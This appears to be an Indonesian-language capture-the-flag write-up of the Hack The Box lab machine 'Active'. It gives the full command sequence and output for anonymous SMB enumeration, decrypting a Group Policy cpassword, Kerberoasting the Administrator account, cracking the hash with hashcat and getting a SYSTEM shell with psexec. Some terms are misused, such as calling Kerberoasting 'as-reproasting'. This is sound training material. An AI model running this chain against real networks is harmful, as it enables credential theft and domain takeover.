featured

Information Gathering

Port Scanning

nmap -sV -sC 10.10.10.100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-21 17:27 WIB
Stats: 0:01:10 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
Nmap scan report for 10.10.10.100
Host is up (0.082s latency).
Not shown: 982 closed tcp ports (conn-refused)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-05-21 10:22:26Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-05-21T10:23:24
|_  start_date: 2024-05-20T14:33:11
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required
|_clock-skew: -5m28s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.50 seconds

SMB Folder

smbclient -N -L '\\10.10.10.100\'         
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Replication     Disk      
        SYSVOL          Disk      Logon server share 
        Users           Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
                                                        

Initial Access

ketika kita melihat smb share folder dengan anonymous login, kita akan mengetahui bahwa terdapat folder Replication didalamnya terdapat banyak folder dan file, untuk itu mari kita download semuanya ke lokal kita

smbclient -N  '\\10.10.10.100\Replication
mask ""
recurse ON
prompt OFF
mget *

pada bagian ini kita mendapatkan sebuah file Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml yang mengandung password didalamnya

grep -Ril pass                                                                                      
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

mari kita decrypt password tersebut

gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
GPPstillStandingStrong2k18

disini kita mendapatkan plain text password dari user svc_tgs, selanjutnya mari kita coba untuk connect ke smb untuk memastikan apakah kredensial tersebut valid atau tidak

smbclient //10.10.10.100/Users -U active.htb\\SVC_TGS%GPPstillStandingStrong2k18

kita berhasil terkoneksi ke smb dengan kredensial tersebut, ini menunjukan bahwa kredensial tersebut valid

Privilege Escalation

selanjutnya mari kita melakukan as-reproasing dengan kredensial yang kita dapatkan

python3 GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
Impacket v0.11.0 - Copyright 2023 Fortra

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-19 02:06:40.351723  2024-05-21 17:39:56.537348             



[-] CCache file is not found. Skipping...
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

disini saya mendapatkan pesan error Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) ini memungkinkan timedate kita tidak sinkron dengan server tersebut, mari kita melakukan sinkronisasi dengan perintah berikut

sudo rdate -n 10.10.10.100 #akan mengembalikan server time date
sudo timedatectl set-ntp false #disable Automatic time synchronization
sudo timedatectl set-time "YYYY-MM-DD HH:MM:SS" #set timedate by rdate response

selanjutnya mari kita menjalan lagi perintah berikut

python3 GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
Impacket v0.11.0 - Copyright 2023 Fortra

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-19 02:06:40.351723  2024-05-21 17:39:56.537348             



[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$d1329a37f473f9cc6c3d07e42568cace$0c91a9d5734b26eab84ff239fbe2af505f4168dfd8ceddbc591ed82614dbc7bfa2d5fda5c89a7885f1f3523a3f578cab79097a07226ac3f0db0ca87c9d381bb367f92151ff2a7dc9d8a4bd36757a9ac7c1aea275e3490098859ccc271e1d5a57400bb0502cb9c7c01b516dddf0dce2dba1fd6346983da31ca4c6fc2ca8b0cc3eae280323f9ec0782b4c18a98154275105b2b9c7ada9592a6e33f071c49429467105fc54830bfbc67edd3a53046218bca85d6fd2f72847ec336f0fddc3926bd2f2c7c47579c2c4c2014a32cefd5336b1bb5231409112bb6614a203295355dcbc029c988577bfb9408397b915c6f9b5236b3a9a7f3b3117bad30fa3821bea4a4bb39b423f53b412126faed0bd15d32bffbc66ff22f9f2f324e47220a2a5c3c885a418b823600d0e277e3eb71935749bad99c374bcae0d89f1c39cf81aa9cd9f4059778c4b39d1136720888bda5635fbdfc0ca2635ae6473d3c857c20ee7ff8a54370a243aa6fab66cf6c560ad9bea69c2fcdf72fcc40f92fb58d2a2db1c539fd006bc10cd33a174a1596a20a6e5d6bf67ee6aca86cb4f168c5ccdc7b462cdfd2124f6f7e96eae1c76e02f3889eff94316a4a35848b2e9a47803fab1494f9a09d5c3bd25fb779e6e3d23b46789d6d0416b42bcf804cad9b0e4f221b381611151eca4b1247107218d74d23e38fc3292ef5442d5e9f1c76bddd054322d74aea0ce3a6ccfdbadae5416188c963b9681cbda241ba1daaf4e5396f1c628da3bb7fba50bcaadab8f0c253f97bdb14ccac372c53ed953bc8b4a325cad08d64f6d979be015a6c77906a0a38cbd22ed1be7141d31fd1f83160c923381d5eb60b5090e149d678445950f29263707f5531994a0fe4ed8bde693f2e2905986fb7db47e5ac05c3ed85041152b461ec6372b011f289b0d2df4b9fb0bc7064d2f9aba59f3d7dca765854313298eb2da290c49a32825b50f4077d29afaf687975a457b8db4548ae847533228bc7b5850002515e32b1576d49813b02a30d102193a854877f12e2bb5d7a5eea9617af466542bc8671a098e39b0b75cd61168e76ea0c076983c5bebeb0debc22859e80db39eeff399ab69642313462d4c5c9b3918c4954663d1dee67a1120900a99ecef8d25a4c8c3192bba3a83d17a4c4e94aeeb2548a1d2c11cd97dda17704110397fd06788af37b61b10efd361809fd17c0d779c49773c694de4c59884bdf5705f0a04250ea4e922fc763eff5077b6f7accf8263134bb

disini kita akan mendapatkan TGT hash, mari kita crack menggunakan hashcat dengan module -m 13100 (13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol)

hashcat -m 13100 hash /usr/share/wordlists/rockyou.txt
...
$krb5tgs$23$Administrator$ACTIVE.HTB$active.....:Ticketmaster1968
...

disini kita berhasil mendapatkan administrator password, mari kita coba untuk login dengan impacket-psexec

impacket-psexec administrator:[email protected]  

dan kita berhasil mendapatkan nt authority\system